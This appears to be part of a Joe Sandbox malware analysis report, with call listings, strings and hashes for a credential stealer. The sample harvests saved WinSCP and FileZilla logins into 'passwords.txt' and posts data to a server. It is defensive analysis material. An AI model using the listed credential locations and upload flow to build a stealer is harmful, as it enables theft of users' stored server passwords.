GetProcAddress.KERNEL32(74DD0000,012BE038), ref: 00418F6E
GetProcAddress.KERNEL32(74DD0000,012BE050), ref: 00418F87
GetProcAddress.KERNEL32(74DD0000,012BE068), ref: 00418F9F
GetProcAddress.KERNEL32(74DD0000,012BE0C8), ref: 00418FB7
GetProcAddress.KERNEL32(74DD0000,012C25D8), ref: 00418FD0
GetProcAddress.KERNEL32(74DD0000,012BF350), ref: 00418FE8
GetProcAddress.KERNEL32(74DD0000,012C2488), ref: 00419000
GetProcAddress.KERNEL32(74DD0000,012C25A8), ref: 00419019
GetProcAddress.KERNEL32(74DD0000,012B2600), ref: 00419031
GetProcAddress.KERNEL32(74DD0000,012C24A0), ref: 00419049
GetProcAddress.KERNEL32(74DD0000,012B2680), ref: 00419062
GetProcAddress.KERNEL32(74DD0000,012C2530), ref: 0041907A
GetProcAddress.KERNEL32(74DD0000,012C24B8), ref: 00419092
GetProcAddress.KERNEL32(74DD0000,012B25A0), ref: 004190AB
GetProcAddress.KERNEL32(74DD0000,012B2780), ref: 004190C3
LoadLibraryA.KERNEL32(012C23E0,0041807F,?,00000040,00000064,004144A0,00413A10,?,0000002C,00000064,004143F0,00414440,?,00000024,00000064,00414340), ref: 004190D5
LoadLibraryA.KERNEL32(012C24D0), ref: 004190E6
LoadLibraryA.KERNEL32(012C2410), ref: 004190F8
LoadLibraryA.KERNEL32(012C2428), ref: 0041910A
LoadLibraryA.KERNEL32(012C2518), ref: 0041911B
LoadLibraryA.KERNEL32(012C2368), ref: 0041912D
LoadLibraryA.KERNEL32(012C2380), ref: 0041913F
LoadLibraryA.KERNEL32(012C24E8), ref: 00419150
LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00419160
GetProcAddress.KERNEL32(75290000,012B25C0), ref: 0041917C
GetProcAddress.KERNEL32(75290000,012C23F8), ref: 00419194
GetProcAddress.KERNEL32(75290000,012BFA00), ref: 004191AD
GetProcAddress.KERNEL32(75290000,012C2548), ref: 004191C5
GetProcAddress.KERNEL32(75290000,012B27A0), ref: 004191DD
GetProcAddress.KERNEL32(734C0000,012B4188), ref: 004191FD
GetProcAddress.KERNEL32(734C0000,012B2640), ref: 00419215
GetProcAddress.KERNEL32(734C0000,012B3FA8), ref: 0041922E
GetProcAddress.KERNEL32(734C0000,012C2500), ref: 00419246
GetProcAddress.KERNEL32(734C0000,012C2560), ref: 0041925E
GetProcAddress.KERNEL32(734C0000,012B2960), ref: 00419277
GetProcAddress.KERNEL32(734C0000,012B26E0), ref: 0041928F
GetProcAddress.KERNEL32(734C0000,012C2458), ref: 004192A7
GetProcAddress.KERNEL32(752C0000,012B2800), ref: 004192C3
GetProcAddress.KERNEL32(752C0000,012B25E0), ref: 004192DB
GetProcAddress.KERNEL32(752C0000,012C25F0), ref: 004192F4
GetProcAddress.KERNEL32(752C0000,012C25C0), ref: 0041930C
GetProcAddress.KERNEL32(752C0000,012B2860), ref: 00419324
GetProcAddress.KERNEL32(74EC0000,012B3E40), ref: 00419344
GetProcAddress.KERNEL32(74EC0000,012B4138), ref: 0041935C
GetProcAddress.KERNEL32(74EC0000,012C2578), ref: 00419375
GetProcAddress.KERNEL32(74EC0000,012B2880), ref: 0041938D
GetProcAddress.KERNEL32(74EC0000,012B2660), ref: 004193A5
GetProcAddress.KERNEL32(74EC0000,012B41B0), ref: 004193BE
GetProcAddress.KERNEL32(75BD0000,012C2608), ref: 004193DE
GetProcAddress.KERNEL32(75BD0000,012B2820), ref: 004193F6
GetProcAddress.KERNEL32(75BD0000,012BF8C0), ref: 0041940F
GetProcAddress.KERNEL32(75BD0000,012C2620), ref: 00419427
GetProcAddress.KERNEL32(75BD0000,012C2590), ref: 0041943F
GetProcAddress.KERNEL32(75BD0000,012B2700), ref: 00419458
GetProcAddress.KERNEL32(75BD0000,012B28C0), ref: 00419470
GetProcAddress.KERNEL32(75BD0000,012C2398), ref: 00419488
GetProcAddress.KERNEL32(75BD0000,012C2338), ref: 004194A1
GetProcAddress.KERNEL32(75A70000,012B2740), ref: 004194BD
GetProcAddress.KERNEL32(75A70000,012C2350), ref: 004194D5
GetProcAddress.KERNEL32(75A70000,012C23B0), ref: 004194EE
GetProcAddress.KERNEL32(75A70000,012C23C8), ref: 00419506
GetProcAddress.KERNEL32(75A70000,012C2440), ref: 0041951E
GetProcAddress.KERNEL32(75450000,012B27C0), ref: 0041953A
GetProcAddress.KERNEL32(75450000,012B2720), ref: 00419552
GetProcAddress.KERNEL32(75DA0000,012B27E0), ref: 0041956E
GetProcAddress.KERNEL32(75DA0000,012C2470), ref: 00419586
GetProcAddress.KERNEL32(6F090000,012B2840), ref: 004195A6
GetProcAddress.KERNEL32(6F090000,012B28A0), ref: 004195BE
GetProcAddress.KERNEL32(6F090000,012B28E0), ref: 004195D7
GetProcAddress.KERNEL32(6F090000,012C26B0), ref: 004195EF
GetProcAddress.KERNEL32(6F090000,012B2900), ref: 00419607
GetProcAddress.KERNEL32(6F090000,012B2920), ref: 00419620
GetProcAddress.KERNEL32(6F090000,012B2940), ref: 00419638
GetProcAddress.KERNEL32(6F090000,012C27A0), ref: 00419650
GetProcAddress.KERNEL32(6F090000,HttpQueryInfoA), ref: 00419667
GetProcAddress.KERNEL32(6F090000,InternetSetOptionA), ref: 0041967E
GetProcAddress.KERNEL32(75AF0000,012C26C8), ref: 0041969A
GetProcAddress.KERNEL32(75AF0000,012BF9F0), ref: 004196B2
GetProcAddress.KERNEL32(75AF0000,012C2668), ref: 004196CB
GetProcAddress.KERNEL32(75AF0000,012C26E0), ref: 004196E3
GetProcAddress.KERNEL32(75D90000,012C29A0), ref: 004196FF
GetProcAddress.KERNEL32(6CC20000,012C2650), ref: 0041971B
GetProcAddress.KERNEL32(6CC20000,012C2760), ref: 00419733
GetProcAddress.KERNEL32(6CC20000,012C2680), ref: 0041974C
GetProcAddress.KERNEL32(6CC20000,012C2638), ref: 00419764
GetProcAddress.KERNEL32(6CA30000,SymMatchString), ref: 0041977E

Strings

dbghelp.dll, xrefs: 00419156
HttpQueryInfoA, xrefs: 0041965C
InternetSetOptionA, xrefs: 00419673
SymMatchString, xrefs: 00419778

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA$SymMatchString$dbghelp.dll
API String ID: 2238633743-951535364
Opcode ID: c2eee7ed20b900ebed499d3f5db1f2319c82ae11ff88e2a78b23ac08a5a2bb96
Instruction ID: c5f05c92df86ae6c309de6d93bbb22230759f21ed052dce6c69101577189e498
Opcode Fuzzy Hash: c2eee7ed20b900ebed499d3f5db1f2319c82ae11ff88e2a78b23ac08a5a2bb96
Instruction Fuzzy Hash: F06210BD6002029FD744DFA5ECA896637FBF78BB413A06519FA05C7364E734A885CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0040C550 Relevance: 87.9, APIs: 36, Strings: 14, Instructions: 371
stringregistrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0040C58B
memset.MSVCRT ref: 0040C5AA
memset.MSVCRT ref: 0040C5C2
memset.MSVCRT ref: 0040C5DA
memset.MSVCRT ref: 0040C5ED
memset.MSVCRT ref: 0040C5FB
memset.MSVCRT ref: 0040C60C
RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,000000FF), ref: 0040C62E
RegGetValueA.ADVAPI32(000000FF,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040C69E
RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,000000FF), ref: 0040C6D6
RegEnumKeyExA.ADVAPI32(000000FF,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040C718
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040C72C
HeapAlloc.KERNEL32(00000000), ref: 0040C733
lstrcat.KERNEL32(00421610,Soft: WinSCP), ref: 0040C74C
lstrcat.KERNEL32(00421610,Host: ), ref: 0040C75B
RegGetValueA.ADVAPI32(000000FF,?,HostName,00000002,00000000,?,?), ref: 0040C77F
lstrcat.KERNEL32(00421610,?), ref: 0040C78C
RegGetValueA.ADVAPI32(000000FF,?,PortNumber,0000FFFF,00000000,?,?), ref: 0040C7B7
lstrcat.KERNEL32(00421610,00000000), ref: 0040C7DD
lstrcat.KERNEL32(00421610,:22), ref: 0040C7F9
lstrcat.KERNEL32(00421610,00427E4C), ref: 0040C808
lstrcat.KERNEL32(00421610,Login: ), ref: 0040C817
RegGetValueA.ADVAPI32(000000FF,?,UserName,00000002,00000000,?,?), ref: 0040C83B
lstrcat.KERNEL32(00421610,?), ref: 0040C848
lstrcat.KERNEL32(00421610,00427E64), ref: 0040C857
RegGetValueA.ADVAPI32(000000FF,?,Password,00000002,00000000,?,?), ref: 0040C87B
lstrcat.KERNEL32(00421610,Password: ), ref: 0040C886
StrCmpCA.SHLWAPI(?,00427B3E), ref: 0040C898
lstrcat.KERNEL32(00421610,00000000), ref: 0040C8D3
lstrcat.KERNEL32(00421610,00427E80), ref: 0040C8ED
lstrcat.KERNEL32(00421610,00427E84), ref: 0040C8FC
RegEnumKeyExA.ADVAPI32(000000FF,00000001,?,00000104,00000000,00000000,00000000,00000000), ref: 0040C921

Part of subcall function 00411C10: wsprintfA.USER32 ref: 00411C2B

memset.MSVCRT ref: 0040C932
memset.MSVCRT ref: 0040C940
lstrlen.KERNEL32(00421610), ref: 0040C958
memset.MSVCRT ref: 0040C9AB

Strings

PortNumber, xrefs: 0040C7A3
Login: , xrefs: 0040C811
:22, xrefs: 0040C7F3
passwords.txt, xrefs: 0040C96B
UserName, xrefs: 0040C82E
Password, xrefs: 0040C86E
Software\Martin Prikryl\WinSCP 2\Sessions, xrefs: 0040C6CC
Host: , xrefs: 0040C755
UseMasterPassword, xrefs: 0040C693
HostName, xrefs: 0040C772
Password: , xrefs: 0040C880
Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 0040C61B
Soft: WinSCP, xrefs: 0040C746
Security, xrefs: 0040C698

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$memset$Value$EnumHeapOpen$AllocProcesslstrlenwsprintf
String ID: :22$Host: $HostName$Login: $Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
API String ID: 4109173386-1250616252
Opcode ID: dc3298bc845ddf6c22293eff1231b26737cd44cf51dda0dba3085e02b0da23e4
Instruction ID: 39ec2e8349ec0f49430afd06625ec9b021e02694a525698c05ba917c3cb00e0c
Opcode Fuzzy Hash: dc3298bc845ddf6c22293eff1231b26737cd44cf51dda0dba3085e02b0da23e4
Instruction Fuzzy Hash: 51D17AB190021AEBDB10DBE4DC95EFFB77CEB48708F50459AF615A3280D6785E488B74

Uniqueness

Uniqueness Score: -1.00%

Function 00404DD0 Relevance: 74.3, APIs: 26, Strings: 16, Instructions: 810
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 00404412
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040441F
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040442C
Part of subcall function 004043C0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404446
Part of subcall function 004043C0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404456

lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404E56

Part of subcall function 004117A0: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 004117C4
Part of subcall function 004117A0: GetProcessHeap.KERNEL32(00000000,?,?,00404E4A,?,?,?,?,?,?,00000000,00000000,00000000), ref: 004117D3
Part of subcall function 004117A0: HeapAlloc.KERNEL32(00000000,?,?,00404E4A,?,?,?,?,?,?,00000000,00000000,00000000), ref: 004117DA

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

StrCmpCA.SHLWAPI(?,012BF690,004278A7,004278A3,0042789B,00427897,00427896), ref: 00404EE1
InternetOpenA.WININET(00000000,00000001,?,?,?), ref: 00404F07
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405031
HttpOpenRequestA.WININET(00000000,012BF810,?,012C3470,00000000,00000000,-00400100,00000000), ref: 00405072
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405098

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,012B2DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,012BF290,00000000,?,00427960,00000000,?,?), ref: 00405590
lstrlen.KERNEL32(00000000), ref: 004055A2
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004055B5
HeapAlloc.KERNEL32(00000000), ref: 004055BC
lstrlen.KERNEL32(00000000), ref: 004055CE
memcpy.MSVCRT ref: 004055E2
lstrlen.KERNEL32(00000000,?,?), ref: 004055FB
memcpy.MSVCRT ref: 00405605
lstrlen.KERNEL32(00000000), ref: 00405616
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0040562F
memcpy.MSVCRT ref: 0040563C
lstrlen.KERNEL32(00000000,?,00000000), ref: 00405652
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405663
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040568B
InternetReadFile.WININET(00000000,?,000007CF,00000000), ref: 004056D4
InternetReadFile.WININET(00000000,00000000,000007CF,00000000), ref: 0040572B
StrCmpCA.SHLWAPI(00000000,block), ref: 00405743
ExitProcess.KERNEL32 ref: 0040574E
InternetCloseHandle.WININET(00000000), ref: 0040575F

Strings

build_id, xrefs: 0040528C
------, xrefs: 00405348
------, xrefs: 004051E7
", xrefs: 00405417
", xrefs: 0040555E
ERROR, xrefs: 00405698
ERROR, xrefs: 00405832
file_data, xrefs: 00405535
", xrefs: 0040516D
", xrefs: 004052B5
------, xrefs: 00404F60
block, xrefs: 00405735
------, xrefs: 00405491
0, xrefs: 00405706
--, xrefs: 00404F87
------, xrefs: 0040509E

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$Heap$HttpProcessmemcpy$AllocFileOpenReadRequestlstrcat$BinaryCloseConnectCrackCryptExitHandleInfoOptionQuerySendString
String ID: ------$"$"$"$"$--$------$------$------$------$0$ERROR$ERROR$block$build_id$file_data
API String ID: 1603122859-3618031631
Opcode ID: e815b3ad2264143bb48ae0f0fc906797d55cb53abbd96dc878e8bdd3ba56be44
Instruction ID: db5541188cdc9f639a804d86c40747d3c4d91d865bd81aad25c9fe7a46c42329
Opcode Fuzzy Hash: e815b3ad2264143bb48ae0f0fc906797d55cb53abbd96dc878e8bdd3ba56be44
Instruction Fuzzy Hash: 20624471800249EADB15EBE5C951BEEBBB8AF19304F5041AEF50173182DE786B4CCB79

Uniqueness

Uniqueness Score: -1.00%

Function 0040C9F0 Relevance: 73.9, APIs: 31, Strings: 11, Instructions: 401
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 004116F0: SHGetFolderPathA.SHELL32(00000000,?{B,00000000,00000000,?,?,00000000), ref: 00411728

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,012B2DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00406E40: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000002,?,0040CABD,?,00000000,?,00000000,00000000), ref: 00406E77
Part of subcall function 00406E40: GetFileSizeEx.KERNEL32(00000000,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406E8D
Part of subcall function 00406E40: LocalAlloc.KERNEL32(00000040,?,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EA8
Part of subcall function 00406E40: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EC1
Part of subcall function 00406E40: CloseHandle.KERNEL32(00000000,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EE9

Part of subcall function 00411750: LocalAlloc.KERNEL32(00000040,?,00000000,00000001,00000004,?,00413F63,00000000,00000000), ref: 0041176C

strtok_s.MSVCRT ref: 0040CAE9
GetProcessHeap.KERNEL32(00000000,000F423F,00427B47,00427B46,00427B43,00427B42), ref: 0040CB3F
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CB46
StrStrA.SHLWAPI(00000000,<Host>), ref: 0040CB66
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CB71

Part of subcall function 00411BD0: malloc.MSVCRT ref: 00411BE1
Part of subcall function 00411BD0: strncpy.MSVCRT ref: 00411BF1

StrStrA.SHLWAPI(00000000,<Port>), ref: 0040CBA8
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CBB3
StrStrA.SHLWAPI(00000000,<User>), ref: 0040CBF0
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CBFB
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040CC38
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CC47
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CCD3
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CCEB
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CD03
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CD1B
lstrcat.KERNEL32(?,Soft: FileZilla), ref: 0040CD33
lstrcat.KERNEL32(?,Host: ), ref: 0040CD42
lstrcat.KERNEL32(?,00000000), ref: 0040CD55
lstrcat.KERNEL32(?,00427F1C), ref: 0040CD64
lstrcat.KERNEL32(?,00000000), ref: 0040CD77
lstrcat.KERNEL32(?,00427F20), ref: 0040CD86
lstrcat.KERNEL32(?,Login: ), ref: 0040CD95
lstrcat.KERNEL32(?,00000000), ref: 0040CDA8
lstrcat.KERNEL32(?,00427F2C), ref: 0040CDB7
lstrcat.KERNEL32(?,Password: ), ref: 0040CDC6
lstrcat.KERNEL32(?,00000000), ref: 0040CDD9
lstrcat.KERNEL32(?,00427F3C), ref: 0040CDE8
lstrcat.KERNEL32(?,00427F40), ref: 0040CDF7

Part of subcall function 0040FF10: lstrlen.KERNEL32(00418949,?,00000000,?,00417FAF,004283A3,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 0040FF1B
Part of subcall function 0040FF10: lstrcpy.KERNEL32(00000000,00418949), ref: 0040FF52

strtok_s.MSVCRT ref: 0040CE3B
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CE51
memset.MSVCRT ref: 0040CEA5

Strings

Password: , xrefs: 0040CDC0
<Pass encoding="base64">, xrefs: 0040CC32
O{BN{BK{B, xrefs: 0040CE1C
Login: , xrefs: 0040CD8F
passwords.txt, xrefs: 0040CE64
Host: , xrefs: 0040CD3C
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0040CA75
<User>, xrefs: 0040CBEA
<Host>, xrefs: 0040CB60
<Port>, xrefs: 0040CBA2
Soft: FileZilla, xrefs: 0040CD2D

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$AllocFile$HeapLocalstrtok_s$CloseCreateFolderHandlePathProcessReadSizemallocmemsetstrncpy
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $O{BN{BK{B$Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
API String ID: 433178851-1966776650
Opcode ID: 553205438ed012d35cce61669005fd022498ce32dc9c1b61e4ae1c0d2a1abc7d
Instruction ID: d3b6116b1b73df3cabd5054aa1a62d8a43f82c6421f78d5ef7e496df56dda141
Opcode Fuzzy Hash: 553205438ed012d35cce61669005fd022498ce32dc9c1b61e4ae1c0d2a1abc7d
Instruction Fuzzy Hash: 3CE1A175904219EACB04EBA0DC56BEEBB78AF19304F50056EF901731C2DF786A48C769

Uniqueness

Uniqueness Score: -1.00%

Function 00405C90 Relevance: 54.9, APIs: 21, Strings: 10, Instructions: 684
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 00404412
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040441F
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040442C
Part of subcall function 004043C0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404446
Part of subcall function 004043C0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404456

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405D5A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405F04
HttpOpenRequestA.WININET(00000000,012BF810,?,012C3470,00000000,00000000,-00400100,00000000), ref: 00405F44
lstrlen.KERNEL32(00000000,00000000,004205B9,?,00000000,004205B9,",00000000,004205B9,mode,00000000,004205B9,012BF290,00000000,004205B9,004279E8), ref: 00406342
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406353
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040635E
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406365
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406376
memcpy.MSVCRT ref: 00406387
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406398
lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004063B1
memcpy.MSVCRT ref: 004063BA
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 004063CD
HttpSendRequestA.WININET(?,00000000,00000000), ref: 004063E1
InternetReadFile.WININET(?,?,000000C7,00000000), ref: 004063F8
InternetReadFile.WININET(?,00000000,000000C7,00000000), ref: 0040644E
InternetCloseHandle.WININET(?), ref: 00406459
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405F6B

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,012B2DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

InternetCloseHandle.WININET(00000000), ref: 00406466
InternetCloseHandle.WININET(00000000), ref: 00406470
StrCmpCA.SHLWAPI(?,012BF690,?,?,?,?,?,?,00000000), ref: 00405D7A

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Strings

------, xrefs: 004060BA
", xrefs: 00406187
build_id, xrefs: 0040615E
------, xrefs: 00405F71
", xrefs: 00406040
mode, xrefs: 004062BF
*, xrefs: 00406525
------, xrefs: 00405DFF
------, xrefs: 0040621A
", xrefs: 004062E8

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

